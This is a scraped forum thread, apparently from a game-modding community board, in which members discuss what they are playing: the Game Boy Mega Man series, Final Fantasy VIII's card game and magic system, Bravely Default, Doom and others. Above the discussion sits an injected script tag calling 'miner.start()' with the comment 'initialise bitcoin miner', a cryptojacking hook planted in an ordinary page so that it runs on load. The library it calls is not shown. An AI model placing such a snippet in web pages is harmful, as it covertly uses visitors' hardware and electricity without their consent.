<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralpge project

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Re: What games are you playing?

Postby KobaBeach » 5 years ago

YelseyKing wrote:Well, I just finished Megaman III. The stages I had the most overall trouble with were Diveman and Dustman.
Dustman's stage is the worst!!!

Congrats on clearing MM3, that one was probably the hardest of the GB MM games.
Bean wrote:I finally beat Kirby: Triple Deluxe, but there's way too much content in it to shelve it now.
Congrats!

Kirby Triple Deluxe is one of the games I want to get a 3DS for. (and apparently, it came out in Europe today, yahoo!)
Last edited by KobaBeach on 16 May 2014, 13:38, edited 1 time in total.
twitter (spicy at times!) | avatar by kuma

who cares:

devil†zukin

Postby devil†zukin » 5 years ago

oh wait megaman III isnt megaman 3? i didn't even know there were gameboy games

Sorel
In the shadows
First name: Alexander
Pronouns: he/him/his

Postby Sorel » 5 years ago

Rénà wrote:oh wait megaman III isnt megaman 3? i didn't even know there were gameboy games
If you know Quint, Enker, Punk and/or Ballad, then you know the GB games.

Bean

Postby Bean » 5 years ago

Rénà wrote:oh wait megaman III isnt megaman 3? i didn't even know there were gameboy games
Yeah, there's five of them, and I find the last two to be really great. In fact, MMIV just released on the eShop yesterday. It takes four bots from both MM4 and MM5 on the NES with new stages for them. MMV has an all-new cast of bots and was really a fun way to cap things off. As for the others, they do the same four bots from two games thing, just earlier ones. The first one's dated, the second one was done by a different company and sounds horrible, and III's one of the hardest ones I've played.

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 5 years ago

KobaBeach wrote:
YelseyKing wrote:Well, I just finished Megaman III. The stages I had the most overall trouble with were Diveman and Dustman.
Dustman's stage is the worst!!!

Congrats on clearing MM3, that one was probably the hardest of the GB MM games.
Thanks!

I'm halfway through 4 now. The first four stages were pretty easy, though Ringman's stage had some annoying parts. Of the MM5 stages, I've only attempted Crystalman's stage so far. The first half is easy, but the second half... there are two paths you can take, and both of them are annoying. I've gotten pretty far in the stage, but have yet to beat it. Maybe I'll just try another stage first. :P

Also, is it just me, or is Rain Flush *really* broken in this game? In the NES version, its full screen nuke capabilities were offset by it using a lot of energy, giving you only like five or six shots. In the MM4GB, it uses only one bar of energy, making it pretty easily spammable.
Yeah, there's five of them, though they're completely different outside of using some of the same bosses... except 5, which is entirely new.

Technically, both the NES and GB games have the same names (both sets of games use roman numerals), but in general, fans use numbers for the NES games, and roman numerals for the GB ones, to differentiate them. It's not a problem in Japan, since they were titled "Rockman World" over there... and there's some unused graphics in MM1GB that suggests they were, at one point, going to call the series Megaman World over here. I wonder why they ended up... not doing that.
Last edited by YelseyKing on 16 May 2014, 19:20, edited 1 time in total.
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

pholtos
Loves adorable things.

Postby pholtos » 5 years ago

Started Desktop Dungeons and am still in tutorial mode in FF Tactics.

I recommend desktop dungeons to peoples.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

metasomnia?
the calm before the storm
First name: Meta

Postby metasomnia? » 5 years ago

I started replaying A Link to the Past earlier today and when I went into one of the early dungeons and saw some stalfos, I thought "what the hell is pholtos doing here?"
It took me a minute to realize pholtos's avatar is a stalfos.

Medley
The younger sister
First name: It's ambiguous, really
Pronouns:

Postby Medley » 5 years ago

You know, I didn't notice that either. Huh.
Pyon!

Sorel
In the shadows

Well, my first reaction was: "Why is there a Stalfos..." when I saw pholtos' avatar.

YelseyKing

Just finished Megaman 4 Gameboy. That last stage was great, if *really* long. Thankfully, getting a game over at the final battle allowed you to restart right at the beginning of it. I imagine there were other such "continue" points, but that was the only time I actually *got* a game over in that stage, by some miracle.

Overall, the game was, like 3, a lot of fun, though fairly hard. Not *as* hard as 3, but still trickier than the NES version. Crystalman and Stoneman's stages were probably the roughest, especially the former. There are *so* many ways to instantly kill yourself there. Not sure why anyone would want to take the upper route when the path forks near the midpoint, since it's not only harder, but the only "reward" is two small energy capsules which are easily missed. The much simpler lower route has a 1-up, as well as an appearance by Eddie. Stoneman's stage just had some crazy jumps and annoyingly-placed enemies, as well as a couple difficult side paths that I went through once, saw they were just for a 1-up and an E-Tank, and said "screw this, not worth it, not doing these again".

One problem with the game I found was that it had the worst selection of special weapons I've ever seen. Maybe I simply didn't use them right, but... you had three "launch straight ahead" weapons (Ring Boomerang, Pharaoh Shot, and Crystal Eye), and three of the most unwieldy MM5 weapons (Charge Kick, Power Stone, and Napalm Bomb). Only the Rain Flush and Flash Stopper were all that interesting outside of a few key areas. Kind of a shame.

Anyway, on to 5!

Moists:

Doctor Shemp
Banned

Postby Doctor Shemp » 5 years ago

I've been playing through Doom 2 but this time I'm actually making it to the later levels for the first time. Nearly beaten it but it's slow progress. It's gotten really mean-spirited now though. A switch may be required to progress or it may reveal 10 mancubi and lock the door into the area. There's just no way to tell.

Eila

Postby Eila » 5 years ago

Not playing yet, but in a few days I will be stuck into the Doom 4 beta and Wolfenstein. I haven't been this excited for new games in quite a long time.

Phoba

Postby Phoba » 5 years ago

So Megaman 8-Bit Deathmatch V4 update got released today, and my god, probably the best update it got. The only thing that frustrates me is the new maps having team mode, which teammates just gets killed by swarms of the other team. But after that, it's just amazing.
(Funny how people were talking about Doom and Megaman)
(a)smbx(t) stuff i'll probably not continue???
https://www.youtube.com/watch?v=xb3QzmureUo

KobaBeach
obscure jrpg enthusiast

I was bored and so I replayed FFVIII, up until a bit after where I was last time, all while trying to make sure that I got Siren when fighting Elvoret

Only took me 3 and a half hours, no biggie (I'm not the most rational person)

I'm about to go to Timber
Triple Triad is kinda neat, but I'm p. bad at it

Drawing spells is kinda tedious but I don't mind (I try to draw at least 20+ of one spell, except for Cure, of which I have like 65+ on Squall, Zell and Selphie each and a few like Protect and Esuna that I have really few of because eh)

who cares:

devil†zukin

Postby devil†zukin » 5 years ago

drawing spells can get a little grindy and i hate the grindy parts in those games and try to avoid them but i love the junctioning system in that game

actually ff8 is good for that i think u can probably beat the game without even fighting random battles

the card game in that one i actually played unlike the one in ff9 i never bothered with it was just kinda annoying

KobaBeach
obscure jrpg enthusiast

Rénà wrote:i think u can probably beat the game without even fighting random battles
Like the SaGa games (post-Romancing), FF8 uses level scaling

As Squall levels up higher and higher, the enemies level up alongside him
You can pretty much leave him at Lv. 7 and level up everyone else and the game will be a cakewalk

You can even increase stats simply by refining items and cards into magic that you can later junction, you don't even need to level up anyone in the first place

It's really easy to break the game
Rénà wrote:the card game in that one i actually played unlike the one in ff9 i never bothered with it was just kinda annoying
Everyone hates Tetra Master

Don't worry, you're not alone

who cares:

Medley
The younger sister
First name: It's ambiguous, really
Pronouns:

Postby Medley » 5 years ago

I loved Tetra Master...
Pyon!

YelseyKing

KobaBeach wrote:I was bored and so I replayed FFVIII, up until a bit after where I was last time, all while trying to make sure that I got Siren when fighting Elvoret

Only took me 3 and a half hours, no biggie (I'm not the most rational person)
Heh, I was gonna actually recommend you just restarting, since GFs are super useful especially early on, but I wasn't sure how you'd take it, so I didn't. Glad you got Siren, though; she's got some useful abilities, and an extra magic junction is always helpful.
KobaBeach wrote:I'm about to go to Timber
Triple Triad is kinda neat, but I'm p. bad at it
It takes some practice. I recommend playing defensively. Once you've obtained a few cards with strong corners (that is, numbers 7 or higher on both of any of the card's four corners; you should have the Ifrit card, which is one of these), it becomes very unlikely you'll lose against normal players (whose cards' values will never exceed 7). Play those cards in ways in which the opponent can't take it no matter what it plays; obviously, the more of these strong defensive cards you have, the better. You may want to consult an FAQ to find out which people have one-of-a-kind cards (which are almost always extremely powerful), since it's pretty arbitrary (for instance, the Quistis groupies in the Garden cafeteria use the Quistis card, and the boy in blue running around the Garden's halls uses Minimog). You can also learn Quezacotl's "Card" ability and try to turn enemies into cards. While most enemies will be turned into their own card, there's a small (about 1/8) chance you'll instead turn them into a "Boss" card. These are weaker than GF and Character cards, but are still plenty stronger than the ones you'll find on most players. Outside Balamb Garden, Bite Bugs can sometimes be carded into Elvoret cards, and Glacial Eyes can sometimes be Carded into Jumbo Cactuar cards, both excellent "Corner" cards.

Other than that, practice, practice, practice. Later on, you'll find that other regions have different rules... once you offer to play a game with them, if your last opponent was from outside that region, they'll ask you to combine rulesets (for instance, the first time you play with someone in Timber, they'll ask to use their rules and Balamb's). Once the Triple Triad screen opens, you can play a game, or cancel out of the menu, and the same thing will happen: there's a chance of either a rule from the region you were just in being "spread", meaning everyone will now use it, or a chance of one of the new region's rules being abolished (no one will use it again). You can save before playing and reload if a rule you didn't want to spread does, or you *really* want a rule abolished. Balamb is one of the only regions that, by default, has the Open rule in effect. You'll absolutely want to spread that to every region in the game, as without it, the computer flagrantly cheats. Their last card will always magically be *just* the one it needs to beat you, especially under the Same and Plus rules. Also, many regions have the horrid, horrid "Random" rule in effect, which forces your cards to be selected at random. Obviously, this has absolutely no effect on the AI, whose cards are random *anyhow*, but it seriously screws *you* over, since there's little reason to use anything other than boss, GF, or Character cards, and it almost always gives you really crappy cards. Abolish this at all costs. It takes a while, but you'll be glad you did. Especially get rid of it in Dollet, as there's a card-based subquest that originates there which requires you *lose* certain cards to someone. Obviously Random makes that much, much harder.

Phew. Sorry about the wall of text. I just love Triple Triad. :lol:
KobaBeach wrote:Drawing spells is kinda tedious but I don't mind (I try to draw at least 20+ of one spell, except for Cure, of which I have like 65+ on Squall, Zell and Selphie each and a few like Protect and Esuna that I have really few of because eh)
Drawing magic will become considerably easier once you get a higher magic stat. Once everyone has a magic junction and a decent set of spells junctioned to it, you'll find that it's rare that you won't draw 9 at a time. Though tedious, it's worth getting 100 of many spells, not to use, so much as to junction, as the more spells you junction to a stat, the better the effect. Yeah, it's kinda weird that you stock all these spells and end up not using most of them to keep your stats high, but... yeah.

Moists:

Ishntknew

Postby Ishntknew » 5 years ago

Getting real close to the end of Bravely Default now. I just finished the bonus dungeon, including the hidden boss at the end. Took a long time to whittle him down to 0 HP...
Imagine my frustration when the fox used "Call Adventurer" next turn, forcing me to start over from scratch. That's a trick I won't fall for again.
Now, onward to the final boss!
I'm a lizard's nightmare

Backloggery:
daypular

Bwarch
Local Candy Fiend
Pronouns: He/Him/His

Postby Bwarch » 5 years ago

Tried out Fistful of Frags the other night. As expected, it's really fun!... When it works right. It's probably just my computer and internet connection but I had a hard time getting a lag free session, even when I explicitly went to servers for low latency.

Obviously Total Biscuit didn't experience any of that so yeah, it's probably on my end.

But it's really fun, and having to really consider your shots is a blast. It's going to be even better once they get more game modes on there~

KobaBeach
obscure jrpg enthusiast

Just before the 2nd Laguna flashback!

Laguna is the dumbest dumb that ever dumbed and I love him for that
I shall aspire to be more like him in real life

Fun fact: The guy who voiced him in the Japanese version of Dissidia Duodecim also voiced Balthier, Sanji from One Piece, Kotetsu from Tiger & Bunny and that one digimon that I absolutely refuse to stop talking about (and also the Digimon Adventure narrator)

Also the sword from sanic and the black whatever (no really)

P.S. I don't know why but the fake President turning into a deformed mutant zombie thing made me laugh. It's just so absurd.

P.P.S. Don't worry I didn't miss Pet Pals vol. 1-4. I got this all under control (not really)
Ishntknew wrote:Getting real close to the end of Bravely Default now. I just finished the bonus dungeon, including the hidden boss at the end. Took a long time to whittle him down to 0 HP...
Imagine my frustration when the fox used "Call Adventurer" next turn, forcing me to start over from scratch. That's a trick I won't fall for again.
Now, onward to the final boss!
Good luck!!!!

who cares:

Bean

Postby Bean » 5 years ago

I got through level four of five in Road Rash last night. Just glad that the game counts 4th place as a podium spot, though, or I'd still be trying to get past it.

Sorel
In the shadows

Phoba wrote:So Megaman 8-Bit Deathmatch V4 update got released today, and my god, probably the best update it got. The only thing that frustrates me is the new maps having team mode, which teammates just gets killed by swarms of the other team. But after that, it's just amazing.
(Funny how people were talking about Doom and Megaman)
Maybe I shall consider downloading it once again.

Currently playing BattleBlock Theater together with a pal. It's fun.

YelseyKing

And so, having just finished Megaman V, the "Week of the Megaman Game Boy series" comes to a close. I'd say V was the best of the bunch, with a lot of neat weapons and powerups, an actual original cast, great music, and a spectacular final stage. The Rush "shmup" segment was unexpected and pretty fun, though that laser segment (albeit short) was mostly trial and error. Once inside, the return of the revenge of the revenge of the return of the four penultimate bosses from MM1-4 was a nice touch, even if they all seemed quite a bit easier. I wasn't a huge fan of the long shafts that came after those fights, though. Half of them had a hidden room if you hung to the right, while the others just dropped you into spikes. I think I lost a life after each of those blasted things.

Also: Tango! Hooray, Tango! Why wasn't he in more games?!?! Sure, he's just a less effective variation of Beat, gameplay-wise. But come on, look at this guy! Tell me he's not just the cutest widdle green robot kitty cat everrrrrr~~~~ :3 :3 :3
...sorry, got a bit carried away there. Cats have that effect on me.

Anyhow, I'll probably finish up the two "fighters" on MMAC next (they shouldn't take very long each), then... hm. I'd take on Wily Wars, since I've never played that, but I don't appear to have a Genesis emulator, and... I have no idea which ones are any good. Also, I've heard that there are some issues with unlocking Wily Tower due to the game utilizing an odd, non-standard save system. Any ideas/suggestions?

Moists:

Ishntknew

Postby Ishntknew » 5 years ago

Aaaa I finished Bravely Default today. That ending was amazing. One of the most clever things I've ever seen in a video game, and one of the absolute best ways of engaging a player in the plot.
By which I mean integrating the player into the plot. Ouroboros tearing open a rift to the Celestial Realm, and then seeing my own face beyond it? Now that was impressive. Especially since I could see just how determined I was to kill this guy from the expression on my face. That was even better than the way EarthBound did it.
Looking forward to Bravely Second!
I'm a lizard's nightmare

Backloggery:
daypular

Return to “the cartridgé”